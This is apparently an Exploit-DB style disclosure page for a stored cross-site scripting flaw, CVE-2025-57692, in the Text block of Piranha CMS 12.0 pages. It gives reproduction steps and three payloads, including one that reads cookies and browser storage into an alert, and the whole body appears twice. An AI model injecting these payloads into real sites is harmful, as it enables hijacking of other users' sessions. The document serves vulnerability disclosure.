6.8
/ 10
MEDIUM
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L
Description
Exploit Title: Piranha CMS 12.0 - Stored Cross Site Scripting Date: 2025-09-26 Exploit Author: Chidubem Chukwu Terminal Venom LinkedIn : https://www.linkedin.com/in/chidubem-chukwu-20bb202a9? Vendor Homepage: https://piranhacms.org Software Link:...
Basic Information
ID
EDB-ID:52471
Published
Feb 2, 2026 at 00:00
Affected Product
Affected Versions
# Exploit Title: Piranha CMS 12.0 - Stored Cross Site Scripting
# Date: 2025-09-26
# Exploit Author: Chidubem Chukwu (Terminal Venom)
# LinkedIn : https://www.linkedin.com/in/chidubem-chukwu-20bb202a9?
# Vendor Homepage: https://piranhacms.org
# Software Link: https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0
# Version: 12.0
# Category: Web Application
# Tested on: Ubuntu 22.04, Piranha CMS v12.0 (local), Chrome
# CVE: CVE-2025-57692
# Privilege Level: authenticated user
# Patched Version: Not available
# Exploit link: https://github.com/Saconyfx/security-advisories/blob/main/CVE-2025-57692/advisory.md
## Reproduction Steps ##
PiranhaCMS 12.0 allows stored XSS in the Text content block of Standard and Standard Archive Pages via /manager/pages, enabling execution of arbitrary JavaScript in another user s browser.
Reproduction steps
1. Log in to the Piranha admin panel at https://<host>/manager/login.
2. Navigate to Pages.
3. Click Add Page and choose Standard Page or Standard Archive.
4. Enter a page title (e.g., XSS-Test).
5. Click the [ + ] button and select Text under Content to add a Text block.
6. In the Text block input area, paste one of the payloads below (paste directly into the editor and save). The payload will execute immediately when pasted/saved and will also execute for anyone who later accesses or previews the page.
Payload A
<img src="x" onerror="
alert(
'Cookies: ' + document.cookie + '\n' +
'LocalStorage: ' + JSON.stringify(localStorage) + '\n' +
'SessionStorage: ' + JSON.stringify(sessionStorage) + '\n' +
'URL: ' + window.location.href + '\n' +
'User Agent: ' + navigator.userAgent + '\n' +
'Time: ' + new Date().toLocaleString()
)
" />
Payload B — iframe base64
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>
Payload C — details toggle (on-toggle alert)
<details open ontoggle=alert('XSS')>Click</details>
7. Click Save. The payload executes immediately upon save (and will execute again when the page is previewed or accessed by others).
8. Anyone who accesses the page (or pastes the payload) will trigger the XSS.
# Date: 2025-09-26
# Exploit Author: Chidubem Chukwu (Terminal Venom)
# LinkedIn : https://www.linkedin.com/in/chidubem-chukwu-20bb202a9?
# Vendor Homepage: https://piranhacms.org
# Software Link: https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0
# Version: 12.0
# Category: Web Application
# Tested on: Ubuntu 22.04, Piranha CMS v12.0 (local), Chrome
# CVE: CVE-2025-57692
# Privilege Level: authenticated user
# Patched Version: Not available
# Exploit link: https://github.com/Saconyfx/security-advisories/blob/main/CVE-2025-57692/advisory.md
## Reproduction Steps ##
PiranhaCMS 12.0 allows stored XSS in the Text content block of Standard and Standard Archive Pages via /manager/pages, enabling execution of arbitrary JavaScript in another user s browser.
Reproduction steps
1. Log in to the Piranha admin panel at https://<host>/manager/login.
2. Navigate to Pages.
3. Click Add Page and choose Standard Page or Standard Archive.
4. Enter a page title (e.g., XSS-Test).
5. Click the [ + ] button and select Text under Content to add a Text block.
6. In the Text block input area, paste one of the payloads below (paste directly into the editor and save). The payload will execute immediately when pasted/saved and will also execute for anyone who later accesses or previews the page.
Payload A
<img src="x" onerror="
alert(
'Cookies: ' + document.cookie + '\n' +
'LocalStorage: ' + JSON.stringify(localStorage) + '\n' +
'SessionStorage: ' + JSON.stringify(sessionStorage) + '\n' +
'URL: ' + window.location.href + '\n' +
'User Agent: ' + navigator.userAgent + '\n' +
'Time: ' + new Date().toLocaleString()
)
" />
Payload B — iframe base64
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>
Payload C — details toggle (on-toggle alert)
<details open ontoggle=alert('XSS')>Click</details>
7. Click Save. The payload executes immediately upon save (and will execute again when the page is previewed or accessed by others).
8. Anyone who accesses the page (or pastes the payload) will trigger the XSS.